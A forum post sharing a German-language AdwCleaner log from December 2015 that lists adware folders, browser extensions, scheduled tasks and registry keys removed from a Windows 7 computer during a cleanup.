EmreTprk | 22.12.2015 12:21 | AdwCleaner Logfile: Code:
# AdwCleaner v5.026 - Bericht erstellt am 21/12/2015 um 23:18:07
# Aktualisiert am 21/12/2015 von Xplode
# Datenbank : 2015-12-21.3 [Server]
# Betriebssystem : Windows 7 Ultimate Service Pack 1 (x64)
# Benutzername : Özkan - EASYNOTE
# Gestartet von : C:\Users\Özkan\Documents\logs\Downloads\adwcleaner_5.026.exe
# Option : Löschen
# Unterstützung : Forum - ToolsLib
***** [ Dienste ] *****
[-] Dienst Gelöscht : innfd_1_10_0_14
[-] Dienst Gelöscht : tbfd_1_10_0_16
***** [ Ordner ] *****
[-] Ordner Gelöscht : C:\Program Files\Conduit
[-] Ordner Gelöscht : C:\Program Files\SavingsbullFilter
[-] Ordner Gelöscht : C:\Program Files (x86)\Conduit
[-] Ordner Gelöscht : C:\Program Files (x86)\SNT
[-] Ordner Gelöscht : C:\Program Files (x86)\Systweak Support Dock
[-] Ordner Gelöscht : C:\Program Files (x86)\SystemPreserve
[-] Ordner Gelöscht : C:\Program Files (x86)\YoutubeAdblocker
[!] Ordner Nicht Gelöscht : C:\Program Files (x86)\YoutubeAdblocker
[-] Ordner Gelöscht : C:\ProgramData\apn
[-] Ordner Gelöscht : C:\ProgramData\Babylon
[-] Ordner Gelöscht : C:\ProgramData\House Of Soft
[-] Ordner Gelöscht : C:\ProgramData\MountainApp
[-] Ordner Gelöscht : C:\ProgramData\SNT
[-] Ordner Gelöscht : C:\ProgramData\WPM
[-] Ordner Gelöscht : C:\ProgramData\Allmyapps
[-] Ordner Gelöscht : C:\ProgramData\YoutubeAdblocker
[-] Ordner Gelöscht : C:\ProgramData\webbsauvE
[-] Ordner Gelöscht : C:\ProgramData\webSaove
[!] Ordner Nicht Gelöscht : C:\ProgramData\YoutubeAdblocker
[-] Ordner Gelöscht : C:\ProgramData\3d0a37a800000c8d
[-] Ordner Gelöscht : C:\ProgramData\460804d7b62ababa
[-] Ordner Gelöscht : C:\ProgramData\5046288706989374138
[-] Ordner Gelöscht : C:\ProgramData\6acef0df000016fa
[-] Ordner Gelöscht : C:\ProgramData\{c9728bcd-ea62-4578-c972-28bcdea62f37}
[-] Ordner Gelöscht : C:\ProgramData\fmkcnflhkcgkdkchbdminbbekojbfhmc
[-] Ordner Gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Uniblue
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\torch
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Crossbrowse
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Conduit
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\cool_mirage
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\genienext
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\globalUpdate
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Mobogenie
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\torch
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Tuguu_SL
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\SmartWeb
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\80137FAD-1431551225-E211-83C6-B888E3CF1A37
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\papbadoldddalgcjcicnikcfenodpghp
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jecgbfoconhopjngaaijjgffhokohlac
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\papbadoldddalgcjcicnikcfenodpghp
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jecgbfoconhopjngaaijjgffhokohlac
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\LocalLow\IminentToolbar
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Roaming\Advanced System Protector
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Roaming\newnext.me
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Roaming\OpenCandy
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Roaming\Systweak
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Roaming\UpdaterEX
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Roaming\WebExtend
[#] Ordner Gelöscht : C:\Windows\SysNative\Tasks\Advanced System Protector
***** [ Dateien ] *****
[-] Datei Gelöscht : C:\END
[-] Datei Gelöscht : C:\Users\Özkan\daemonprocess.txt
[-] Datei Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_pstatic.bestpriceninja.com_0.localstorage
[-] Datei Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_pstatic.bestpriceninja.com_0.localstorage-journal
[-] Datei Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage
[-] Datei Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage-journal
[-] Datei Gelöscht : C:\Windows\Reimage.ini
[-] Datei Gelöscht : C:\Windows\SysNative\roboot64.exe
[-] Datei Gelöscht : C:\Windows\SysNative\drivers\netfilter64.sys
***** [ DLLs ] *****
***** [ Verknüpfungen ] *****
***** [ Aufgabenplanung ] *****
[-] Geplante Aufgabe Gelöscht : Advanced System Protector
[-] Geplante Aufgabe Gelöscht : SmartWeb Upgrade Trigger Task
[-] Geplante Aufgabe Gelöscht : LaunchPreSignup
[-] Geplante Aufgabe Gelöscht : Superclean
[-] Geplante Aufgabe Gelöscht : Plus-HD-5.0-chromeinstaller
[-] Geplante Aufgabe Gelöscht : Plus-HD-5.0-enabler
[-] Geplante Aufgabe Gelöscht : Plus-HD-5.0-firefoxinstaller
[-] Geplante Aufgabe Gelöscht : Plus-HD-5.0-updater
***** [ Registrierungsdatenbank ] *****
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\driverscanner
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\iesmartbar.bandobjectattribute
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\iesmartbar.bho
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\iesmartbar.dockingpanel
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\iesmartbar.iesmartbar
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\iesmartbar.iesmartbarbandobject
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\iesmartbar.smartbardisplaystate
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\iesmartbar.smartbarmenuform
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Iminent
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\speedupmypc
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd
[-] Schlüssel Gelöscht : HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\Wpm
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine.1
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Record\{2009AF2F-5786-3067-8799-B97F7832FDD6}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Record\{425E7597-03A2-338D-B72A-0E51FFE77A7E}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Record\{915BB7D5-082E-3B91-B1E0-45B5FDE01F24}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Record\{FB2E65F4-5687-33EF-9BBF-4E3C9C98D3B9}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\cda41201-3d26-3a1b-c3f1-2e83a236eb45
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{C007DADD-132A-624C-088E-59EE6CF0711F}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{00B11DA2-75ED-4364-ABA5-9A95B1F5E946}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{56561B2A-FB5D-363A-9631-4C03D6054209}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{A717364F-69F3-3A24-ADD5-3901A57F880E}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{CCB08265-B35D-30B2-A6AF-6986CA957358}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{CD92622E-49B9-33B7-98D1-EC51049457D7}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{E041E037-FA4B-364A-B440-7A1051EA0301}
